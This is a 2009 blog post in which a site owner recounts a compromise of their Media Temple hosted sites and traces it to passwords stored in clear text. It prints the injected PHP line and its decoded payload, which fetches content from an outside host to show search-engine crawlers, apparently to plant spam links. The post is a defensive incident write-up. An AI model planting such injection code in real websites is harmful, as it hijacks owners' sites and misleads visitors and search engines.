November 24, 2009

My media temple hosted web site got hacked

Last night my web sites hosted at media temple got hacked. I got an email from them saying that they detected "suspicious activity". Good that they have something in place that is able to detect that, but this time it was not really necessary since the web sites were malfunctioning so I found out about the issue myself pretty quickly...

Turned out that all of my index.php and index.html files were changed. Also a .htaccess files was added next to those files (or replaced if there was one before).
There was a piece of code added to the files:

<!--ddgbsre_erd_sdd--><?php eval(base64_decode("aWYoc3RyaXBvcygkX1NF

When you base64-decode this you get (indentation by me):

if(stripos($_SERVER['HTTP_USER_AGENT'], 'google') or
stripos($_SERVER['HTTP_USER_AGENT'], 'yahoo') or
stripos($_SERVER['HTTP_USER_AGENT'], 'msn') or
stripos($_SERVER['HTTP_USER_AGENT'], 'live'))
$r = '';
if($f=@fsockopen('',80,$e,$er,10) and
@fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) .
"&useragent=" . urlencode($_SERVER['HTTP_USER_AGENT']) .
" HTTP/1.0\r\nHost:\r\n\r\n"))
while( $l = fread($f, 1024)) $r .= $l;
$p=strpos($r,"\r\n\r\n"); echo substr($r,$p+4);

I do not know much about PHP, but it seems that requests from search engine crawlers get special treatment and additional content is added to the page which is retrieved from the IP address I guess the purpose is to add links to other sites to increase their page rank.
At least for my php sites this did not work however. The code addition invalided the files, presenting an error to the user for all requests.

Not sure how the hack was done. The media temple email suggested to change the ftp/ssh passwords. But I doubt that these passwords were compromised, because it seems that I am not the only one at media temple having the problem:
Let's wait what media temple has to say about this.

Update 27-Nov-2009: Media temple published some information on how the hack was done. Seems that the attacker got hold of passwords which have been stored as clear text. Read more about this in the media temple FAQ for this issue. There is also a how-to for fixing hacked accounts.
blog comments powered by Disqus